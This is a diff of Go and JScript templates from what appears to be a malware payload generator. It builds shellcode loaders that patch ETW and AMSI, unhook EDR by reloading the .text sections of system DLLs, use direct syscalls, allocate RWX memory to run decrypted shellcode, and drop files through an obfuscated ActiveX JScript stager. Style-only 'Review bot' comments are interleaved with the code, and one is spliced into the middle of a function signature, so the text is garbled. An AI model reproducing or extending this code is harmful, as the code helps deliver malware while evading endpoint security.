opt.outFile, filename, name, opt.CommandLoader, opt.URL, opt.sandbox, opt.path) } 
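Review bot: The guard `if opt.ProcessInjection != "" && opt.refresher == true` is now dead code: this commit removes the `-unmodified` flag and the `refresher:` initializer from `options()`, so `opt.refresher` (if the field still exists) can only be its zero value and the `log.Fatal` can never fire. Either delete the check or re-express it against the option that replaced it, e.g. `if opt.ProcessInjection != "" && opt.evasion == "None" {`, assuming `-Evasion None` is the successor of `-unmodified` as its help text suggests. Separately, `Loader.CompileFile` now takes fifteen positional arguments, most of them strings and bools copied out of `opt`, which makes call sites easy to mis-order silently; passing `opt` (or a small options struct) would be safer. `main`'s body starts outside this hunk.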
diff --git a/Struct/Struct.go b/Struct/Struct.go index 2850d03..6793755 100644 --- a/Struct/Struct.go +++ b/Struct/Struct.go @@ -203,7 +203,6 @@ func JS_Msiexec_Sub() string { func JSfile() string { return ` try { - var {{.Variables.fso}} = new ActiveXObject("Scripti"+"ng.FileSys"+"temObject"); var {{.Variables.dropPath}} = {{.Variables.fso}}.GetSpecialFolder(2); @@ -214,11 +213,10 @@ func JSfile() string { {var {{.Variables.base6411}}decoded={{.Variables.Magic1}}({{.Variables.res1}});var {{.Variables.TextStream11}}=new ActiveXObject('A'+'D'+'O'+'D'+'B'+'.'+'S'+'t'+'r'+'e'+'a'+'m');{{.Variables.TextStream11}}.Type=2;{{.Variables.TextStream11}}.charSet='iso-8859-1';{{.Variables.TextStream11}}.Open();{{.Variables.TextStream11}}.WriteText({{.Variables.base6411}}decoded);var {{.Variables.BinaryStream}}=new ActiveXObject('A'+'D'+'O'+'D'+'B'+'.'+'S'+'t'+'r'+'e'+'a'+'m');{{.Variables.BinaryStream}}.Type=1;{{.Variables.BinaryStream}}.Open();{{.Variables.TextStream11}}.Position=0;{{.Variables.TextStream11}}.CopyTo({{.Variables.BinaryStream}});{{.Variables.BinaryStream}}.SaveToFile({{.Variables.filename1}},2);{{.Variables.BinaryStream}}.Close()} {{.Variables.dll}} - + {{.Variables.binaryWriter}}({{.Variables.dllvar}},{{.Variables.dropPath}}+"\\{{.Variables.FileName}}{{.Variables.dllext}}"); {{.Variables.Loader}} - }catch(e) { } ` @@ -270,7 +268,7 @@ func Macro() string { func WS_JS() string { return ` - var {{.Variables.manifest}} = ' '; + var {{.Variables.manifest}} = ' '; var {{.Variables.ax}} = new ActiveXObject("Microsoft.Windows.ActCtx"); {{.Variables.ax}}.ManifestText = {{.Variables.manifest}}; @@ -278,7 +276,7 @@ func WS_JS() string { ` } -func Decrypt_Function() string { +func AESDecrypt_Function() string { return ` func {{.Variables.PKCS5UnPadding}}({{.Variables.src}} []byte) []byte { {{.Variables.length}} := len({{.Variables.src}}) 
@@ -288,10 +286,11 @@ func {{.Variables.PKCS5UnPadding}}({{.Variables.src}} []byte) []byte { func {{.Variables.FuncName}}() []byte { {{.Variables.ciphertext}} - {{.Variables.vciphertext}}, _ := base64.StdEncoding.DecodeString({{.Variables.fullciphertext}}) - {{.Variables.vkey}}, _ := base64.StdEncoding.DecodeString("{{.Variables.key}}") - {{.Variables.viv}}, _ := base64.StdEncoding.DecodeString("{{.Variables.iv}}") + {{.Variables.vciphertext}}, _ := hex.DecodeString({{.Variables.fullciphertext}}) + {{.Variables.vkey}}, _ := hex.DecodeString("{{.Variables.key}}") + {{.Variables.viv}}, _ := hex.DecodeString("{{.Variables.iv}}") + {{.Variables.block}}, _ := aes.NewCipher({{.Variables.vkey}}) 
@@ -300,223 +299,80 @@ func {{.Variables.FuncName}}() []byte { {{.Variables.mode}}.CryptBlocks({{.Variables.decrypted}}, {{.Variables.vciphertext}}) {{.Variables.stuff}} := {{.Variables.PKCS5UnPadding}}({{.Variables.decrypted}}) - {{.Variables.rawdata}} := (string({{.Variables.stuff}})) - {{.Variables.hexdata}}, _ := base64.StdEncoding.DecodeString({{.Variables.rawdata}}) - {{.Variables.raw_bin}}, _ := hex.DecodeString(string({{.Variables.hexdata}})) - return {{.Variables.raw_bin}} + return {{.Variables.stuff}} } - ` } - -func DLL_Refresher() string { +func RCFDecrypt_Function() string { return ` - package main - - import "C" - - import ( - "debug/pe" - "encoding/base64" - {{.Variables.HEX_Import}} - "[loader]/[loader]" - "io/ioutil" - "strconv" - "syscall" - "unsafe" - {{.Variables.SandboxOS}} - - "golang.org/x/sys/windows" - "golang.org/x/sys/windows/registry" - - ) - - - const ( - {{.Variables.PROCESS_ALL_ACCESS}}= 0x1F0FFF - ) - var _ unsafe.Pointer - var ( - {{.Variables.customsyscall}} uint16 - {{.Variables.customsyscallVP}} uint16 - {{.Variables.number}} int = {{.Variables.b64number}} - ) - - - - {{.Variables.Sandboxfunction}} - - func {{.Variables.Versionfunc}}() string { - {{.Variables.k}}, _ := registry.OpenKey(registry.LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", registry.QUERY_VALUE) - {{.Variables.Version}}, _, _ := {{.Variables.k}}.GetStringValue("CurrentVersion") - {{.Variables.MV}}, _, err := {{.Variables.k}}.GetIntegerValue("CurrentMajorVersionNumber") - if err == nil{ - {{.Variables.MinV}}, _, _ := {{.Variables.k}}.GetIntegerValue("CurrentMinorVersionNumber") - {{.Variables.Version}} = strconv.FormatUint({{.Variables.MV}}, 10) + "." 
+ strconv.FormatUint({{.Variables.MinV}}, 10) - } - defer {{.Variables.k}}.Close() - {{.Variables.SyscallNumberlist}} - - } - - - func {{.Variables.loader}}() { - err := {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l'})) - if err != nil { - } - err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', 'b', 'a', 's', 'e', '.', 'd', 'l', 'l'})) - if err != nil { - } - err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'a', 'd', 'v', 'a', 'p', 'i', '3', '2', '.', 'd', 'l', 'l'})) - if err != nil { - } - err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l'})) - if err != nil { - } - - } - func {{.Variables.decode}}({{.Variables.b64}} string,) string { - var {{.Variables.decoded}} []byte - {{.Variables.decoded}}, _ = base64.StdEncoding.DecodeString({{.Variables.b64}}) - {{.Variables.sum}} := 1 - for i := 1; i < {{.Variables.number}}; i++ { - {{.Variables.decoded}}, _ = base64.StdEncoding.DecodeString(string({{.Variables.decoded}})) - {{.Variables.sum}} += i - } - return string({{.Variables.decoded}}) - - } - - {{.Variables.WriteProcessMemory_Function}} - - {{.Variables.ETW_Function}} - - {{.Variables.AMSI_Function}} + func {{.Variables.FuncName}}() []byte { + {{.Variables.ciphertext}} + ciphertext, _ := hex.DecodeString({{.Variables.fullciphertext}}) + key, _ := hex.DecodeString("{{.Variables.key}}") - func main() { + cipher, err := rc4.NewCipher(key) + if err != nil { + return nil } - {{.Variables.ExportName}} - + {{.Variables.raw_bin}} := make([]byte, len(ciphertext)) 
+ cipher.XORKeyStream({{.Variables.raw_bin}}, ciphertext) - //export Run - func Run() { - {{.Variables.Sandbox}} - {{.Variables.ETW}} - {{.Variables.AMSI}} - {{.Variables.Version}} := {{.Variables.Versionfunc}}() - if {{.Variables.Version}} == "10.0" { - {{.Variables.loader}}() - } - {{.Variables.ETW}} - {{.Variables.raw_bin}} := [loader].{{.Variables.FuncName}}() - var {{.Variables.phandle}} uint64 - var {{.Variables.baseA}}, {{.Variables.zerob}}, {{.Variables.alloctype}}, {{.Variables.protect}} uintptr - {{.Variables.phandle}} = 0xffffffffffffffff - {{.Variables.regionsizep}} := len({{.Variables.raw_bin}}) - {{.Variables.regionsize}} := uintptr({{.Variables.regionsizep}}) - {{.Variables.protect}} = 0x40 - {{.Variables.alloctype}} = 0x3000 - {{.Variables.ptr}} := [loader].[Allocate]({{.Variables.customsyscall}}, {{.Variables.phandle}}, {{.Variables.baseA}}, {{.Variables.zerob}}, {{.Variables.regionsize}}, {{.Variables.alloctype}}, {{.Variables.protect}}, 0) - {{.Variables.buff}} := (*[1890000]byte)(unsafe.Pointer({{.Variables.ptr}})) - for x, y := range []byte({{.Variables.raw_bin}}) { - {{.Variables.buff}} [x] = y - } - syscall.Syscall({{.Variables.ptr}}, 0, 0, 0, 0,) + return {{.Variables.raw_bin}} - } +} + ` +} - func {{.Variables.Reloading}}({{.Variables.DLLname}} string) error { - {{.Variables.dll}}, {{.Variables.error}} := ioutil.ReadFile({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.file}}, {{.Variables.error}} := pe.Open({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.x}} := {{.Variables.file}}.Section(string([]byte{'.', 't', 'e', 'x', 't'})) - {{.Variables.bytes}} := {{.Variables.dll}}[{{.Variables.x}}.Offset:{{.Variables.x}}.Size] - {{.Variables.loaddll}}, {{.Variables.error}} := windows.LoadDLL({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.handle}} := 
{{.Variables.loaddll}}.Handle - {{.Variables.dllBase}} := uintptr({{.Variables.handle}}) - {{.Variables.dllOffset}} := uint({{.Variables.dllBase}}) + uint({{.Variables.x}}.VirtualAddress) - {{.Variables.regionsize}} := uintptr(len({{.Variables.bytes}})) - {{.Variables.handlez}} := uintptr(0xffffffffffffffff) - var {{.Variables.oldfartcodeperms}} uintptr +func ELZMADecrypt_Function() string { + return ` + func {{.Variables.FuncName}}() []byte { + {{.Variables.ciphertext}} + var {{.Variables.buff}} bytes.Buffer + {{.Variables.hexdata}}, _ := hex.DecodeString({{.Variables.fullciphertext}}) - [loader].[NtProtectVirtualMemoryprep]( - {{.Variables.customsyscallVP}}, - {{.Variables.handlez}}, - (*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})), - &{{.Variables.regionsize}}, - 0x40, - &{{.Variables.oldfartcodeperms}}, - ) + {{.Variables.buff2}} := bytes.NewBuffer({{.Variables.hexdata}}) - for i := 0; i < len({{.Variables.bytes}}); i++ { - {{.Variables.loc}} := uintptr({{.Variables.dllOffset}} + uint(i)) - {{.Variables.mem}} := (*[1]byte)(unsafe.Pointer({{.Variables.loc}})) - (*{{.Variables.mem}})[0] = {{.Variables.bytes}}[i] - } - [loader].[NtProtectVirtualMemoryprep]( - {{.Variables.customsyscallVP}}, - {{.Variables.handlez}}, - (*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})), - &{{.Variables.regionsize}}, - 0x20, - &{{.Variables.oldfartcodeperms}}, - ) - return nil + {{.Variables.clear}}, {{.Variables.err}} := xz.NewReader({{.Variables.buff2}}) + if {{.Variables.err}} != nil { + log.Fatalf("NewReader error %s", {{.Variables.err}}) } - -` + io.Copy(&{{.Variables.buff}} , {{.Variables.clear}}) + {{.Variables.raw_bin}} := {{.Variables.buff}}.Bytes() + return {{.Variables.raw_bin}} +} + ` } -func Binary() string { +func Imports() string { return ` - package main + {{.Variables.CPORT}} import ( - "debug/pe" + {{.Variables.debugpeimport}} "encoding/base64" - "time" - "[loader]/[loader]" {{.Variables.HEX_Import}} {{.Variables.DebugImport}} - "io/ioutil" + 
"[loader]/[loader]" + "strconv" + {{.Variables.fmt}} "syscall" "unsafe" - "strconv" + {{.Variables.Time_Import}} {{.Variables.SandboxOS}} - "golang.org/x/sys/windows" - "golang.org/x/sys/windows/registry" - - ) - - - {{.Variables.Debug}} - - const ( - {{.Variables.PROCESS_ALL_ACCESS}}= 0x1F0FFF - ) - var _ unsafe.Pointer - var ( - {{.Variables.customsyscall}} uint16 - {{.Variables.customsyscallVP}} uint16 - {{.Variables.number}} int = {{.Variables.b64number}} + {{.Variables.Windows_Import}} + "golang.org/x/sys/windows/registry" + {{.Variables.AdditionalImports}} ) + ` +} - - {{.Variables.Sandboxfunction}} - +func Console() string { + return ` func {{.Variables.Console}}(show bool) { {{.Variables.getWin}} := syscall.NewLazyDLL(string([]byte{'k', 'e', 'r', 'n', 'e', 'l', '3', '2',})).NewProc({{.Variables.decode}}("{{.Variables.GetConsoleWindowName}}")) 
@@ -533,20 +389,57 @@ func Binary() string { {{.Variables.showWin}}.Call({{.Variables.hwnd}}, {{.Variables.SW_HIDE}}) } } + +` +} + +func Header() string { + return ` + package main + + {{.Variables.Imports}} + + + const ( + {{.Variables.PROCESS_ALL_ACCESS}}= 0x1F0FFF + ) + var _ unsafe.Pointer + var ( + {{.Variables.customsyscall}} uint16 + {{.Variables.customsyscallVP}} uint16 + {{.Variables.number}} int = {{.Variables.b64number}} + ) + + {{.Variables.Debug}} + + {{.Variables.Sandboxfunction}} func {{.Variables.Versionfunc}}() string { {{.Variables.k}}, _ := registry.OpenKey(registry.LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", registry.QUERY_VALUE) {{.Variables.Version}}, _, _ := {{.Variables.k}}.GetStringValue("CurrentVersion") {{.Variables.MV}}, _, err := {{.Variables.k}}.GetIntegerValue("CurrentMajorVersionNumber") if err == nil{ - {{.Variables.MinV}}, _, _ := {{.Variables.k}}.GetIntegerValue("CurrentMinorVersionNumber") - {{.Variables.Version}} = strconv.FormatUint({{.Variables.MV}}, 10) + "." 
+ strconv.FormatUint({{.Variables.MinV}}, 10) + //{{.Variables.MinV}}, _, _ := {{.Variables.k}}.GetIntegerValue("CurrentMinorVersionNumber") + {{.Variables.Version}} = strconv.FormatUint({{.Variables.MV}}, 10) } defer {{.Variables.k}}.Close() - {{.Variables.VersionMessage}} - {{.Variables.SyscallNumberlist}} + if {{.Variables.Version}} == "10" { + {{.Variables.customsyscall}} = 0x18 + {{.Variables.customsyscallVP}} = 0x50 + } else if {{.Variables.Version}} == "6.3" { + {{.Variables.customsyscall}} = 0x17 + {{.Variables.customsyscallVP}} = 0x4f + } else if {{.Variables.Version}} == "6.2" { + {{.Variables.customsyscall}} = 0x16 + {{.Variables.customsyscallVP}} = 0x4e + } else if {{.Variables.Version}} == "6.1" { + {{.Variables.customsyscall}} = 0x15 + {{.Variables.customsyscallVP}}= 0x4d + } + return {{.Variables.Version}} } + func {{.Variables.decode}}({{.Variables.b64}} string,) string { var {{.Variables.decoded}} []byte {{.Variables.decoded}}, _ = base64.StdEncoding.DecodeString({{.Variables.b64}}) 
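Review bot: The minor-version read is left as a commented-out line (`//{{.Variables.MinV}}, _, _ := {{.Variables.k}}.GetIntegerValue("CurrentMinorVersionNumber")`) inside a generated template; since the version string now carries only the major number, delete the line rather than emit dead text into every generated file. The `if/else if` ladder on `{{.Variables.Version}}` that follows is a lookup table and reads more clearly as `switch {{.Variables.Version}} { case "10": ... case "6.3": ... }` with one case per version. `Header`'s string literal continues past this hunk.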
@@ -559,723 +452,194 @@ func Binary() string { } + {{.Variables.Console_Function}} + {{.Variables.WriteProcessMemory_Function}} {{.Variables.ETW_Function}} {{.Variables.AMSI_Function}} - - func {{.Variables.loader}}() { - err := {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l'})) - if err != nil { - {{.Variables.RefreshPE}} - } - err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', 'b', 'a', 's', 'e', '.', 'd', 'l', 'l'})) - if err != nil { - {{.Variables.RefreshPE}} - } - err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'a', 'd', 'v', 'a', 'p', 'i', '3', '2', '.', 'd', 'l', 'l'})) - if err != nil { - {{.Variables.RefreshPE}} - } - err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l'})) - if err != nil { - {{.Variables.RefreshPE}} + + var procReadProcessMemory = syscall.NewLazyDLL("kernel32.dll").NewProc("ReadProcessMemory") + + func {{.Variables.FindAddress}}() uintptr { + var funcNtAllocateVirtualMemory = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l'})).NewProc("NtAllocateVirtualMemory") + handle := uintptr(0xffffffffffffffff) + num := 2 + var add uintptr + AllAddr := funcNtAllocateVirtualMemory.Addr() + for i := 0; i < 20; i++ { + rawr, _, _ := ReadProcessMemory(handle, AllAddr+uintptr(i), uintptr(num)) + f := fmt.Sprintf("%0x", rawr) + if f == "0f05" { + add = AllAddr + uintptr(i) + return add + } } - {{.Variables.EDR}} + return add + } + + func ReadProcessMemory(hProcess uintptr, lpBaseAddress uintptr, nSize uintptr) (lpBuffer []uint8, 
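Review bot: The generated Versionfunc in the new Header template keeps a commented-out template line, `//{{.Variables.MinV}}, _, _ := {{.Variables.k}}.GetIntegerValue("CurrentMinorVersionNumber")`, which is dead text inside a code template; since the minor-version read was deliberately dropped (Version is now the major number alone, hence the comparison against "10"), delete the line rather than leave it commented. The new exported `Header` also has no doc comment; something like `// Header returns the package-level template (imports, constants and the version lookup) that Binary and DLL_Refresher embed via {{.Variables.Header}}.` would do. The decode function at the end of the hunk continues outside it.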
lpNumberOfBytesRead int, ok bool) { + var nBytesRead int + buf := make([]uint8, nSize) + ret, _, _ := procReadProcessMemory.Call( + uintptr(hProcess), + lpBaseAddress, + uintptr(unsafe.Pointer(&buf[0])), + nSize, + uintptr(unsafe.Pointer(&nBytesRead)), + ) + return buf, nBytesRead, ret != 0 } - + ` + +} + +func DLL_Refresher() string { + return ` + {{.Variables.Header}} + + {{.Variables.ExportName}} + {{.Variables.ExportFunction}} + func main() { + } + + + //export Run + func Run() { {{.Variables.Sandbox}} {{.Variables.ETW}} {{.Variables.AMSI}} - time.Sleep({{.Variables.SleepSecond}} * time.Millisecond) {{.Variables.Version}} := {{.Variables.Versionfunc}}() - if {{.Variables.Version}} == "10.0" { - {{.Variables.loader}}() + if {{.Variables.Version}} == "10" { + {{.Variables.Reloading}} } - {{.Variables.ETW}} - {{.Variables.hide}} - {{.Variables.Pointer}} + {{.Variables.ETW}} {{.Variables.raw_bin}} := [loader].{{.Variables.FuncName}}() - {{.Variables.ShellcodeString}} - {{.Variables.ptr}} := func() { - } - var {{.Variables.oldptrperms}} uintptr - {{.Variables.handle}} := uintptr(0xffffffffffffffff) - {{.Variables.regionsize}} := uintptr(len({{.Variables.raw_bin}})) - var {{.Variables.oldfartcodeperms}} uintptr - {{.Variables.runfunc}}, _ := [loader].[NtProtectVirtualMemoryprep]( - {{.Variables.customsyscallVP}}, - {{.Variables.handle}}, - (*uintptr)(unsafe.Pointer(&{{.Variables.ptr}})), - &{{.Variables.regionsize}}, - 0x40, - &{{.Variables.oldptrperms}}, - ) - if {{.Variables.runfunc}} != 0 { - panic("Call to VirtualProtect failed!") - } - {{.Variables.CopyPointer}} - *(**uintptr)(unsafe.Pointer(&{{.Variables.ptr}})) = (*uintptr)(unsafe.Pointer(&{{.Variables.raw_bin}})) - {{.Variables.OverwrittenShellcode}} - - {{.Variables.OverWrittenPoint}} - {{.Variables.runfunc}}, _ = [loader].[NtProtectVirtualMemoryprep]( - {{.Variables.customsyscallVP}}, - {{.Variables.handle}}, - (*uintptr)(unsafe.Pointer(&{{.Variables.raw_bin}})), - &{{.Variables.regionsize}}, - 0x40, - 
&{{.Variables.oldfartcodeperms}}, - ) - if {{.Variables.runfunc}} != 0 { - panic("Call to VirtualProtect failed!!!!!") - } - syscall.Syscall(**(**uintptr)(unsafe.Pointer(&{{.Variables.ptr}})),0, 0, 0, 0,) - + {{.Variables.Shellcode_Exec_Function}}({{.Variables.raw_bin}}) } - func {{.Variables.Reloading}}({{.Variables.DLLname}} string) error { - {{.Variables.ReloadingMessage}} - {{.Variables.dll}}, {{.Variables.error}} := ioutil.ReadFile({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.file}}, {{.Variables.error}} := pe.Open({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.x}} := {{.Variables.file}}.Section(string([]byte{'.', 't', 'e', 'x', 't'})) - {{.Variables.bytes}} := {{.Variables.dll}}[{{.Variables.x}}.Offset:{{.Variables.x}}.Size] - {{.Variables.loaddll}}, {{.Variables.error}} := windows.LoadDLL({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.handle}} := {{.Variables.loaddll}}.Handle - {{.Variables.dllBase}} := uintptr({{.Variables.handle}}) - {{.Variables.dllOffset}} := uint({{.Variables.dllBase}}) + uint({{.Variables.x}}.VirtualAddress) - {{.Variables.regionsize}} := uintptr(len({{.Variables.bytes}})) - {{.Variables.handlez}} := uintptr(0xffffffffffffffff) - var {{.Variables.oldfartcodeperms}} uintptr - - {{.Variables.runfunc}}, _ := [loader].[NtProtectVirtualMemoryprep]( - {{.Variables.customsyscallVP}}, - {{.Variables.handlez}}, - (*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})), - &{{.Variables.regionsize}}, - 0x40, - &{{.Variables.oldfartcodeperms}}, - ) - if {{.Variables.runfunc}} != 0 { - } - for i := 0; i < len({{.Variables.bytes}}); i++ { - {{.Variables.loc}} := uintptr({{.Variables.dllOffset}} + uint(i)) - {{.Variables.mem}} := (*[1]byte)(unsafe.Pointer({{.Variables.loc}})) - (*{{.Variables.mem}})[0] = {{.Variables.bytes}}[i] - } - {{.Variables.runfunc}}, _ = 
[loader].[NtProtectVirtualMemoryprep]( - {{.Variables.customsyscallVP}}, - {{.Variables.handlez}}, - (*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})), - &{{.Variables.regionsize}}, - {{.Variables.oldfartcodeperms}}, - &{{.Variables.oldfartcodeperms}}, - ) - return nil - } -` -} -func DLL() string { - return ` - package main + {{.Variables.Shellcode_Exec}} - import "C" - import ( - "encoding/base64" - {{.Variables.HEX_Import}} - "[loader]/[loader]" - "strconv" - "syscall" - "unsafe" - {{.Variables.SandboxOS}} - - {{.Variables.Windows_Import}} - "golang.org/x/sys/windows/registry" + {{.Variables.ReloadFunction}} - ) - - const ( - {{.Variables.PROCESS_ALL_ACCESS}}= 0x1F0FFF - ) - var _ unsafe.Pointer - var ( - {{.Variables.customsyscall}} uint16 - {{.Variables.customsyscallVP}} uint16 - {{.Variables.number}} int = {{.Variables.b64number}} - ) - - - {{.Variables.Sandboxfunction}} - - func {{.Variables.Versionfunc}}() { - {{.Variables.k}}, _ := registry.OpenKey(registry.LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", registry.QUERY_VALUE) - {{.Variables.Version}}, _, _ := {{.Variables.k}}.GetStringValue("CurrentVersion") - {{.Variables.MV}}, _, err := {{.Variables.k}}.GetIntegerValue("CurrentMajorVersionNumber") - if err == nil{ - {{.Variables.MinV}}, _, _ := {{.Variables.k}}.GetIntegerValue("CurrentMinorVersionNumber") - {{.Variables.Version}} = strconv.FormatUint({{.Variables.MV}}, 10) + "." 
+ strconv.FormatUint({{.Variables.MinV}}, 10) - } - defer {{.Variables.k}}.Close() - {{.Variables.SyscallNumberlist}} - - } - func {{.Variables.decode}}({{.Variables.b64}} string,) string { - var {{.Variables.decoded}} []byte - {{.Variables.decoded}}, _ = base64.StdEncoding.DecodeString({{.Variables.b64}}) - {{.Variables.sum}} := 1 - for i := 1; i < {{.Variables.number}}; i++ { - {{.Variables.decoded}}, _ = base64.StdEncoding.DecodeString(string({{.Variables.decoded}})) - {{.Variables.sum}} += i - } - return string({{.Variables.decoded}}) - - } - - {{.Variables.WriteProcessMemory_Function}} - - {{.Variables.ETW_Function}} - - {{.Variables.AMSI_Function}} - - func main() { - } - - {{.Variables.ExportName}} - - - //export Run - func Run() { - {{.Variables.Sandbox}} - {{.Variables.Versionfunc}}() - {{.Variables.ETW}} - {{.Variables.AMSI}} - {{.Variables.raw_bin}} := [loader].{{.Variables.FuncName}}() - var {{.Variables.phandle}} uint64 - var {{.Variables.baseA}}, {{.Variables.zerob}}, {{.Variables.alloctype}}, {{.Variables.protect}} uintptr - {{.Variables.phandle}} = 0xffffffffffffffff - {{.Variables.regionsizep}} := len({{.Variables.raw_bin}}) - {{.Variables.regionsize}} := uintptr({{.Variables.regionsizep}}) - {{.Variables.protect}} = 0x40 - {{.Variables.alloctype}} = 0x3000 - {{.Variables.ptr}} := [loader].[Allocate]({{.Variables.customsyscall}}, {{.Variables.phandle}}, {{.Variables.baseA}}, {{.Variables.zerob}}, {{.Variables.regionsize}}, {{.Variables.alloctype}}, {{.Variables.protect}}, 0) - {{.Variables.buff}} := (*[1890000]byte)(unsafe.Pointer({{.Variables.ptr}})) - for x, y := range []byte({{.Variables.raw_bin}}) { - {{.Variables.buff}} [x] = y - } - syscall.Syscall({{.Variables.ptr}}, 0, 0, 0, 0) - } - ` } -func WriteProcessMemory_Function() string { - return ` - const ( - {{.Variables.errnoERROR_IO_PENDING}}= 997 - ) - var {{.Variables.errERROR_IO_PENDING}} error = syscall.Errno({{.Variables.errnoERROR_IO_PENDING}}) - var 
{{.Variables.procWriteProcessMemory}} = syscall.NewLazyDLL(string([]byte{'k', 'e', 'r', 'n', 'e', 'l', '3', '2',})).NewProc({{.Variables.decode}}("{{.Variables.WriteProcessMemoryName}}")) - - - func {{.Variables.WriteProcessMemory}}({{.Variables.hProcess}} uintptr, {{.Variables.lpBaseAddress}} uintptr, {{.Variables.lpBuffer}} *byte, {{.Variables.nSize}} uintptr, {{.Variables.lpNumberOfBytesWritten}} *uintptr) (err error) { - r1, _, e1 := syscall.Syscall6({{.Variables.procWriteProcessMemory}}.Addr(), 5, uintptr({{.Variables.hProcess}}), uintptr({{.Variables.lpBaseAddress}}), uintptr(unsafe.Pointer({{.Variables.lpBuffer}})), uintptr({{.Variables.nSize}}), uintptr(unsafe.Pointer({{.Variables.lpNumberOfBytesWritten}})), 0) - if r1 == 0 { - if e1 != 0 { - err = {{.Variables.errnoErr}}(e1) - } else { - err = syscall.EINVAL - } - } - return - } - - func {{.Variables.errnoErr}}(e syscall.Errno) error { - switch e { - case 0: - return nil - case {{.Variables.errnoERROR_IO_PENDING}}: - return {{.Variables.errERROR_IO_PENDING}} - } - - return e - } - ` -} - -func WindowsVersion_Syscall() string { - return ` - if {{.Variables.Version}} == "10.0" { - {{.Variables.customsyscall}} = 0x18 - {{.Variables.customsyscallVP}} = 0x50 - } else if {{.Variables.Version}} == "6.3" { - {{.Variables.customsyscall}} = 0x17 - {{.Variables.customsyscallVP}} = 0x4f - } else if {{.Variables.Version}} == "6.2" { - {{.Variables.customsyscall}} = 0x16 - {{.Variables.customsyscallVP}} = 0x4e - } else if {{.Variables.Version}} == "6.1" { - {{.Variables.customsyscall}} = 0x15 - {{.Variables.customsyscallVP}}= 0x4d - } - return {{.Variables.Version}} -` -} - -func WindowsVersion_Syscall_Unmod() string { - return ` - if {{.Variables.Version}} == "10.0" { - {{.Variables.customsyscall}} = 0x18 - } else if {{.Variables.Version}} == "6.3" { - {{.Variables.customsyscall}} = 0x17 - } else if {{.Variables.Version}} == "6.2" { - {{.Variables.customsyscall}} = 0x16 - } else if {{.Variables.Version}} == "6.1" { - 
{{.Variables.customsyscall}} = 0x15 - } -` -} - -func ETW_Function() string { - return ` - var {{.Variables.procEtwNotificationRegister}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc({{.Variables.decode}}("{{.Variables.EtwNotificationRegisterName}}")) - var {{.Variables.procEtwEventRegister}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc({{.Variables.decode}}("{{.Variables.EtwEventRegisterName}}")) - var {{.Variables.procEtwEventWriteFull}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc({{.Variables.decode}}("{{.Variables.EtwEventWriteFullName}}")) - var {{.Variables.procEtwEventWrite}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc({{.Variables.decode}}("{{.Variables.EtwEventWriteName}}")) - - func {{.Variables.ETW}}() { - {{.Variables.handle}} := uintptr(0xffffffffffffffff) - {{.Variables.dataAddr}} := []uintptr{ {{.Variables.procEtwNotificationRegister}}.Addr(), {{.Variables.procEtwEventRegister}}.Addr(), {{.Variables.procEtwEventWriteFull}}.Addr(), {{.Variables.procEtwEventWrite}}.Addr()} - for i, _ := range {{.Variables.dataAddr}} { - {{.Variables.data}}, _ := hex.DecodeString("4833C0C3") - var {{.Variables.nLength}} uintptr - {{.Variables.datalength}} := len({{.Variables.data}}) - {{.Variables.WriteProcessMemory}}({{.Variables.handle}}, {{.Variables.dataAddr}}[i], &{{.Variables.data}}[0], uintptr(uint32({{.Variables.datalength}})), &{{.Variables.nLength}}) - } - } - -` -} - -func AMSI_Function() string { - return ` - 